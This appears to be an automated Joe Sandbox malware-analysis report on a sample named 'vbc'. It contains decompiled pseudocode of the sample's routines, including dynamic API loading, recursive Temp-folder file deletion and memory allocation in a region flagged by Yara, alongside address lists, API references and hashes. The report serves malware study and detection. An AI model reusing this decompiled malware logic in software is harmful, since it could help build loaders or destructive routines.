											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7328405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E73281B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E732816BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E732813B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E732816BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E732813B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E732813B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E732813B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E732812CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E732813B1(_t90) * 4);
					goto L165;
				}
			}

0x73281c07
0x73281c0a
0x73281c0d
0x73281c10
0x73281c13
0x73281c16
0x73281c19
0x73281c1b
0x73281c1e
0x73281c21
0x73281c26
0x73281c29
0x73281c31
0x73281c39
0x73281c3b
0x73281c3e
0x73281c46
0x73281c46
0x73281c4b
0x73281c4e
0x00000000
0x00000000
0x73281c5b
0x73281c60
0x73281c62
0x73281cf4
0x73281cf4
0x73281cf4
0x73281cf8
0x73281cfb
0x73281cfd
0x73281d1f
0x73281d21
0x73281d24
0x73281d2d
0x73281d33
0x73281d35
0x73281d3b
0x73281d3b
0x73281d41
0x73281d44
0x73281d44
0x73281d47
0x73281d47
0x73281d4d
0x73281d4f
0x73281d4f
0x73281d51
0x73281d54
0x73281d57
0x73281d5d
0x73281d63
0x73281d66
0x73281d8a
0x73281d8d
0x00000000
0x00000000
0x73281d90
0x73281d92
0x73281da0
0x73281da3
0x73281da5
0x00000000
0x00000000
0x00000000
0x00000000
0x73281da7
0x73281da7
0x73281da7
0x73281dad
0x73281daf
0x00000000
0x00000000
0x73281db1
0x73281db3
0x73281db5
0x73281db7
0x00000000
0x00000000
0x00000000
0x73281db7
0x73281db9
0x73281dbb
0x73281dbd
0x73281dbd
0x73281dc3
0x73281dc9
0x73281dcb
0x73281ddf
0x73281ddf
0x73281de1
0x73281dcd
0x73281dd3
0x73281dd6
0x73281dd6
0x00000000
0x73281d68
0x73281d68
0x73281d68
0x73281d69
0x73281d71
0x73281d75
0x73281d7b
0x73281d7f
0x00000000
0x73281d7f
0x73281d6b
0x73281d6b
0x73281d6c
0x00000000
0x00000000
0x73281d6e
0x73281d6f
0x00000000
0x00000000
0x00000000
0x73281d6f
0x73281cff
0x73281d00
0x73281d09
0x73281d0c
0x73281d19
0x73281d19
0x73281d0e
0x73281d0e
0x73281de7
0x73281dea
0x73281dee
0x73281e61
0x73281e65
0x73281c43
0x00000000
0x73281c43
0x00000000
0x73281e65
0x73281cfd
0x73281c68
0x73281c6b
0x73281cce
0x73281cd1
0x73281ce3
0x73281ce3
0x73281ce6
0x73281df3
0x73281df6
0x73281df6
0x73281df8
0x732821ae
0x732821c6
0x732821c6
0x732821c9
0x00000000
0x00000000
0x732821b3
0x732821b4
0x732821b7
0x732821ba
0x73282244
0x7328224b
0x73282251
0x73282255
0x73281e5c
0x73281e5d
0x73281e5d
0x73281e5e
0x00000000
0x73281e5e
0x732821c0
0x732821c3
0x732821c3
0x732821cb
0x732821ce
0x73282238
0x73281e51
0x73281e54
0x73281e57
0x73281e5a
0x73281e5a
0x00000000
0x73281e5a
0x732821d0
0x732821d3
0x732821da
0x732821da
0x732821dd
0x732821e1
0x732821f5
0x732821f5
0x732821f8
0x732821fc
0x00000000
0x00000000
0x732821fe
0x73282202
0x00000000
0x00000000
0x73282204
0x7328220b
0x7328220b
0x73282211
0x73282214
0x73282230
0x73282216
0x7328221f
0x73282222
0x73282222
0x00000000
0x73282214
0x732821e3
0x732821e6
0x732821ea
0x00000000
0x00000000
0x732821ec
0x00000000
0x732821ec
0x732821d5
0x732821d8
0x00000000
0x00000000
0x00000000
0x732821d8
0x73281dfe
0x73281dfe
0x73281dff
0x73281f49
0x73281f49
0x73281f50
0x73281f53
0x00000000
0x00000000
0x73281f60
0x00000000
0x7328214b
0x7328214e
0x73282151
0x73282151
0x73282152
0x73282153
0x73282156
0x73282159
0x7328215c
0x00000000
0x00000000
0x7328215e
0x7328215e
0x73282162
0x7328217a
0x7328217d
0x73282181
0x73282187
0x00000000
0x73282187
0x73282164
0x73282164
0x73282167
0x00000000
0x00000000
0x73282169
0x7328216c
0x7328216e
0x7328216f
0x7328216f
0x7328216f
0x73282170
0x73282173
0x73282176
0x73282177
0x73282151
0x73282152
0x73282153
0x73282156
0x73282159
0x7328215c
0x00000000
0x00000000
0x00000000
0x7328215c
0x00000000
0x73281fa7
0x00000000
0x00000000
0x73281fb3
0x00000000
0x00000000
0x73281f9a
0x73281f9e
0x73281fa2
0x00000000
0x00000000
0x7328211c
0x73282120
0x00000000
0x00000000
0x73282126
0x7328212f
0x73282136
0x7328213e
0x00000000
0x00000000
0x73282083
0x73282083
0x00000000
0x00000000
0x73281fbc
0x00000000
0x00000000
0x732821a6
0x00000000
0x00000000
0x7328208b
0x7328208d
0x7328208d
0x00000000
0x00000000
0x73282196
0x00000000
0x00000000
0x7328219a
0x00000000
0x00000000
0x732821a2
0x00000000
0x00000000
0x732820d3
0x732820d5
0x732820d5
0x00000000
0x00000000
0x7328209d
0x7328209f
0x7328209f
0x00000000
0x00000000
0x732820af
0x732820b1
0x732820b1
0x00000000
0x00000000
0x732820e1
0x732820e3
0x732820e3
0x00000000
0x00000000
0x732820ba
0x732820bc
0x732820bc
0x00000000
0x00000000
0x732820c1
0x00000000
0x00000000
0x7328219e
0x732821a8
0x732821a8
0x00000000
0x00000000
0x732820ec
0x732820f0
0x732820f5
0x732820f8
0x732820f9
0x732820fc
0x73282102
0x73282102
0x00000000
0x00000000
0x7328218e
0x00000000
0x00000000
0x732820c5
0x732820c7
0x732820c7
0x00000000
0x00000000
0x73281fc3
0x73281fc3
0x00000000
0x00000000
0x732820da
0x732820dc
0x732820dc
0x00000000
0x00000000
0x73281f67
0x73281f6d
0x73281f70
0x73281f72
0x73281f72
0x73281f75
0x73281f79
0x73281f86
0x73281f88
0x73281f8e
0x73281f8e
0x73281f8e
0x00000000
0x00000000
0x7328208e
0x7328208e
0x73282090
0x73282097
0x00000000
0x00000000
0x732820d6
0x732820d6
0x00000000
0x00000000
0x732820a0
0x732820a0
0x732820a2
0x732820a9
0x00000000
0x00000000
0x732820b2
0x732820b2
0x732820b4
0x00000000
0x00000000
0x732820e4
0x732820e4
0x00000000
0x00000000
0x732820bd
0x732820bd
0x00000000
0x00000000
0x7328210a
0x7328210e
0x73282113
0x73282116
0x00000000
0x00000000
0x732820c8
0x732820c8
0x732820cb
0x732820cd
0x00000000
0x00000000
0x732820dd
0x732820dd
0x732820e6
0x732820e6
0x73281fc5
0x73281fc5
0x73281fc8
0x73281fcf
0x73281fd1
0x73281fd3
0x73281fda
0x73281fdd
0x73281fe2
0x73281fe4
0x73281fe6
0x73281fea
0x73281ff0
0x73281ff6
0x73281ff6
0x73281ff8
0x73281ff8
0x73281ff9
0x73281ff9
0x73281ffd
0x73282003
0x73282005
0x73282009
0x7328200e
0x7328200e
0x73282010
0x73282010
0x73282013
0x73282016
0x7328201f
0x73282025
0x73282028
0x73282028
0x7328202a
0x7328202d
0x73282033
0x73282039
0x73282039
0x7328203b
0x00000000
0x00000000
0x73282041
0x73282041
0x73282045
0x7328204c
0x73282070
0x73282070
0x73282074
0x73282076
0x73282079
0x73282079
0x7328207c
0x7328207c
0x00000000
0x73282074
0x73282051
0x73282054
0x73282054
0x7328205b
0x7328205d
0x73282060
0x73282067
0x73282068
0x7328206e
0x7328206e
0x00000000
0x7328206e
0x73282062
0x73282065
0x00000000
0x00000000
0x00000000
0x73282065
0x73281ff2
0x73281ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x73281f60
0x73281e05
0x73281e05
0x73281e06
0x73281f46
0x00000000
0x73281f46
0x73281e0c
0x73281e0d
0x00000000
0x00000000
0x73281e13
0x73281e16
0x73281f0b
0x73281f0b
0x73281f0e
0x73281f23
0x73281f25
0x73281f25
0x73281f26
0x73281f29
0x73281f2c
0x73281f38
0x73281f38
0x73281f38
0x73281f2e
0x73281f2e
0x73281f2e
0x73281f3e
0x00000000
0x73281f3e
0x73281f10
0x73281f10
0x73281f11
0x73281f1f
0x00000000
0x73281f1f
0x73281f14
0x73281f15
0x00000000
0x00000000
0x73281f1b
0x00000000
0x73281f1b
0x73281e1c
0x73281f07
0x00000000
0x73281f07
0x73281e22
0x73281e22
0x73281e25
0x73281e4e
0x00000000
0x73281e4e
0x73281e27
0x73281e27
0x73281e2a
0x73281e44
0x00000000
0x73281e44
0x73281e2c
0x73281e2c
0x73281e2f
0x73281e3e
0x00000000
0x73281e3e
0x73281e32
0x73281e33
0x00000000
0x00000000
0x73281e35
0x00000000
0x73281cec
0x73281cec
0x73281cef
0x00000000
0x73281cef
0x73281ce6
0x73281cd3
0x73281cd8
0x00000000
0x00000000
0x73281cda
0x73281cdd
0x00000000
0x00000000
0x00000000
0x73281cdd
0x73281c6d
0x73281c70
0x73281ca6
0x73281ca9
0x00000000
0x73281caf
0x73281cb1
0x73281cb5
0x73281cbc
0x73281cc3
0x73281cc6
0x73281cc9
0x00000000
0x73281cc9
0x73281ca9
0x73281c72
0x73281c73
0x73281c8e
0x73281c91
0x00000000
0x73281c97
0x73281c97
0x73281c9e
0x73281ca1
0x00000000
0x73281ca1
0x73281c91
0x73281c78
0x00000000
0x73281c7e
0x73281c7e
0x73281c85
0x00000000
0x73281c85
0x73281c78
0x73281e74
0x73281e79
0x73281e7e
0x73281e82
0x73282355
0x7328235b
0x73281e94
0x73281e96
0x73281e97
0x7328227e
0x7328227e
0x73282281
0x73282284
0x732822a1
0x732822a7
0x732822a9
0x732822af
0x732822c6
0x732822c6
0x732822c6
0x732822d3
0x732822d9
0x732822dc
0x732822e2
0x732822e4
0x732822e8
0x732822ea
0x732822f1
0x732822f6
0x732822f9
0x732822fb
0x73282300
0x73282312
0x73282312
0x73282300
0x732822f9
0x732822e8
0x73282318
0x7328231b
0x73282325
0x7328232d
0x7328233a
0x73282340
0x73282343
0x73282273
0x73282273
0x00000000
0x73282273
0x73282349
0x7328234f
0x7328234f
0x00000000
0x00000000
0x73282351
0x73282351
0x73282351
0x73282351
0x00000000
0x7328231d
0x7328231d
0x73282323
0x00000000
0x00000000
0x00000000
0x73282323
0x7328231b
0x732822b2
0x732822b8
0x732822ba
0x732822c0
0x00000000
0x00000000
0x00000000
0x732822c0
0x73282286
0x7328228d
0x73282293
0x73282299
0x00000000
0x73282299
0x73281e9d
0x73281e9e
0x7328225d
0x7328225d
0x73282263
0x73282266
0x00000000
0x00000000
0x7328226d
0x73282272
0x00000000
0x73282272
0x73281ea5
0x00000000
0x00000000
0x73281eab
0x73281eab
0x73281eb4
0x73281eb9
0x73281ebf
0x00000000
0x00000000
0x73281ec5
0x73281ed2
0x73281ed8
0x73281ee2
0x73281ee8
0x73281ef0
0x73281f00
0x00000000
0x73281f00

APIs

Part of subcall function 732812BB: GlobalAlloc.KERNELBASE(00000040,?,732812DB,?,7328137F,00000019,732811CA,-000000A0), ref: 732812C5

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73281D2D
lstrcpyW.KERNEL32(00000008,?), ref: 73281D75
lstrcpyW.KERNEL32(00000808,?), ref: 73281D7F
GlobalFree.KERNEL32(00000000), ref: 73281D92
GlobalFree.KERNEL32(?), ref: 73281E74
GlobalFree.KERNEL32(?), ref: 73281E79
GlobalFree.KERNEL32(?), ref: 73281E7E
GlobalFree.KERNEL32(00000000), ref: 73282068
lstrcpyW.KERNEL32(?,?), ref: 73282222
GetModuleHandleW.KERNEL32(00000008), ref: 732822A1
LoadLibraryW.KERNEL32(00000008), ref: 732822B2
GetProcAddress.KERNEL32(?,?), ref: 7328230C
lstrlenW.KERNEL32(00000808), ref: 73282326

Memory Dump Source

Source File: 00000009.00000002.722913626.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true

Associated: 00000009.00000002.722901717.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722939825.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722947781.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73280000_vbc.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: e76836966a224de07889179de3a56976589f11d59966701e1a55e8e6eee12a4e
Instruction ID: bde674b89ea2efbae24d9cf95df647bf0a9520796ee205eed234c3959f478019
Opcode Fuzzy Hash: e76836966a224de07889179de3a56976589f11d59966701e1a55e8e6eee12a4e
Instruction Fuzzy Hash: F7228971E1030ADFDB129FA4C5847EEB7B4FB08315F24852AD1A6E62C4D7B4A6C1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c53
0x00405c58
0x00405c61
0x00405c64
0x00405c6c
0x00405c6f
0x00405c72
0x00405c7a
0x00405c7c
0x00405c7d
0x00000000
0x00405c7d
0x00405c88
0x00405c8b
0x00405c8b
0x00405c8b
0x00405c8f
0x00405ca2
0x00405ca9
0x00405cae
0x00405cb2
0x00405cc2
0x00405cb4
0x00405cba
0x00405cba
0x00405cc7
0x00405ccb
0x00405cd7
0x00405cdd
0x00405ce2
0x00405ce8
0x00405cf3
0x00405cf9
0x00405cfb
0x00405cfe
0x00405da8
0x00405da8
0x00405dac
0x00405dae
0x00405dae
0x00405dae
0x00405dae
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d04
0x00405d04
0x00405d04
0x00405d0c
0x00405d2c
0x00405d34
0x00405d39
0x00405d40
0x00405d5b
0x00405d60
0x00405d62
0x00405d86
0x00405d64
0x00405d64
0x00405d67
0x00405d7b
0x00405d69
0x00405d6c
0x00405d74
0x00405d74
0x00405d67
0x00405d42
0x00405d48
0x00405d4a
0x00405d50
0x00405d50
0x00405d4a
0x00000000
0x00405d40
0x00405d0e
0x00405d16
0x00000000
0x00000000
0x00405d18
0x00405d20
0x00000000
0x00000000
0x00405d22
0x00405d2a
0x00000000
0x00000000
0x00000000
0x00405d8b
0x00405d93
0x00405d99
0x00405d99
0x00405da2
0x00000000
0x00405da2
0x00405ccd
0x00405cd5
0x00000000
0x00000000
0x00000000
0x00405c91
0x00405c91
0x00405c93
0x00405db3
0x00405db5
0x00405db8
0x00405e09
0x00405e09
0x00405e09
0x00405dba
0x00405dbd
0x00405dc8
0x00405dcd
0x00405dcf
0x00000000
0x00000000
0x00405dd2
0x00405dde
0x00405de3
0x00405de5
0x00000000
0x00405e00
0x00405de7
0x00405dea
0x00000000
0x00000000
0x00405def
0x00000000
0x00405df6
0x00405dbf
0x00405dbf
0x00000000
0x00405dbf
0x00405c99
0x00405c9c
0x00000000
0x00000000
0x00000000
0x00405c9c

APIs

DeleteFileW.KERNELBASE(?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
lstrcatW.KERNEL32 ref: 00405CBA
lstrcatW.KERNEL32 ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNEL32(00000000), ref: 00405DA2

Strings

., xrefs: 00405D04
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C56
., xrefs: 00405D18
\*.*, xrefs: 00405CB4

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2602864334
Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE

Uniqueness

Uniqueness Score: -1.00%

Function 03699C2E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 208
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(-559D9D5B,?,04BF6AF7), ref: 03699EF2

Strings

!1f, xrefs: 03699EC5

Memory Dump Source

Source File: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3690000_vbc.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: !1f
API String ID: 2167126740-2332926978
Opcode ID: 066e153110cbc54c32399d731b95173388ad31735936199d22f6ac224a0949dd
Instruction ID: e80b034b6983ccdcb92bbfdc4fda217fcd6c1352d4e340fc1859e9007d9bc1b1
Opcode Fuzzy Hash: 066e153110cbc54c32399d731b95173388ad31735936199d22f6ac224a0949dd
Instruction Fuzzy Hash: B97176726053498BEF30DE78CD547DA37EAAF9A360F95022FDC499B254D3318A868B01

Uniqueness

Uniqueness Score: -1.00%

Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}

0x0040687e
0x00406887
0x00000000
0x00406894
0x0040688a
0x00000000

APIs

